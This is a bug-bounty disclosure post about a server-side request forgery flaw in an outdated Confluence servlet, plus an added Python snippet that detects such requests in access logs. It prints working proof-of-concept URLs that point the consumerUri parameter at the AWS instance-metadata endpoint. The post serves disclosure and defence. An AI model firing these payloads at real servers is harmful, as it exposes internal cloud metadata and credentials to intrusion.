Feb 14, 2019

[SSRF] Server Side Request Forgery in a private Program developers.example.com

*****************************************

Program: Private program (HackerOne)
Subdomain: developers.example.com
Bounty: 200$
Severity: Critical
Issue Type: SSRF

****************************************

I found an SSRF vulnerability in a private program on HackerOne.

The affected subdomain (developers) was running a vulnerable Confluence instance, version <= 6.00.

POC example :

developers.example.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com

****************************

Any AWS instance can query an IP and receive information related to that instance, and even account information. I then checked the local host name through the AWS metadata endpoint by visiting
http://169.254.169.254/latest/meta-data/local-hostname/


developers.example.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/
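
On the defensive side, requests like the two above are visible in the web server's access log. The following is an added example, not part of the original post: it scans log lines for requests to the icon-uri servlet whose consumerUri points at a link-local, loopback or private address. The log format, the sample lines and the function names are assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Servlet path and parameter name are taken from the PoC URL in the post.
ICON_URI_PATH = "/plugins/servlet/oauth/users/icon-uri"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) ' + re.escape(ICON_URI_PATH) + r'\?(\S*) HTTP/')


def classify_target(uri):
    """Return why a fetch target counts as internal, or None if it does not."""
    host = ""
    try:
        host = urlsplit(uri).hostname or ""
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal. Only the literal name is checked here; names that
        # resolve to internal addresses need a check at resolution time.
        return "localhost name" if host == "localhost" else None
    if ip.is_link_local:
        return "link-local (instance metadata range)"
    if ip.is_loopback:
        return "loopback"
    if ip.is_private:
        return "private network"
    return None


def find_internal_fetches(log_lines):
    """Return (consumerUri, reason) pairs for icon-uri requests aimed at internal hosts."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for uri in parse_qs(m.group(1)).get("consumerUri", []):
            reason = classify_target(uri)
            if reason:
                hits.append((uri, reason))
    return hits


# Constructed sample access-log lines (combined log format assumed), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Feb/2019:10:00:01 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com HTTP/1.1" 200 512',
    '203.0.113.7 - - [14/Feb/2019:10:00:09 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/ HTTP/1.1" 200 214',
    '198.51.100.4 - - [14/Feb/2019:10:02:30 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http%3A%2F%2F127.0.0.1%3A8090%2F HTTP/1.1" 200 90',
    '198.51.100.9 - - [14/Feb/2019:10:03:00 +0000] "GET /dashboard.action HTTP/1.1" 200 4096',
]
```

The same `classify_target` check can sit in front of any server-side fetch as an allow/deny decision, provided the address is re-checked after DNS resolution.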










Security Researcher at Many Websites - Bug Hunter - Civil Engineer Student
